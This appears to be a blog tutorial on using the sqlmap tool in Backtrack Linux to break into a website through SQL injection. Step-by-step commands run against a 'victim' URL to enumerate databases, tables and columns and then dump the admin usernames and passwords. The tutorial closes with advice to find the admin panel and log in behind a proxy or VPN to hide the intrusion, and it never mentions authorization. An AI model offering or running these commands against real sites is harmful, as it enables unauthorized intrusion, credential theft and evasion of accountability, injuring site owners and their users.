How to Hack a website using SqlMap in Backtrack

Hey every one now i am back again to backtrack with a classic website hacking technique using a tool know as SQL MAP.
So you can check all my tutorial on backtrack here if you are a new visitor.
So come to today's topic Sqlmap is a automatic sql injection tool which helps you to hack vulnerable website easily.
Now to know more on it must have some idea on sql injection .

Now Follow these simple steps to know effective use of this tool.

Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal

Now you have to find a sqli vulnerable site.i have one lets use it.

Now type this command in the terminal and hit enter.(see in image)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

Here it is two database name of the website but in this case we will choose AJ Database.

Now our task is to get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
So in this case the command will be
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

Now you will get the tables list which is stored in aj database.

Now lets grab the columns from the admin table(type following command)
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

Now we got the columns and we got username and password

So finally lets grab the passwords of the admin :).
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we have the username and the password of the website !


Now All you have to do is just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

Thanks For Reading Stay Tuned for many such tutorials :)